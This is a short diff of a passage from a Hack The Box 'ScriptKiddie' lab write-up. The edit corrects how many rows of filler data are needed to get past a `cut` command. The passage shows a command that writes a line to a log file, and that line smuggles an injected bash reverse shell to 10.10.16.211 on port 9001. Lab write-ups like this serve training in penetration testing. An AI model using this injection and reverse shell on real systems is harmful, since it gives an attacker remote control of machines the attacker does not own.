Twigonometry/mac-goodwin.com/mac-goodwin/blog/HTB/_posts/2021-06-12-htb-scriptkiddie.md

 ## Notes on Alternative Methods

-An easier way of 'bypassing' the `cut` command (courtesy of ippsec) was just to match the correct format of the log file, by inserting three rows of arbitrary data before the command:
+An easier way of 'bypassing' the `cut` command (courtesy of ippsec) was just to match the correct format of the log file, by inserting two rows of arbitrary data before the command:

 ```bash
 kid@scriptkiddie:~/logs$ echo 'whatever whatever ;/bin/bash -c "bash -i >& /dev/tcp/10.10.16.211/9001 0>&1"' >> hackers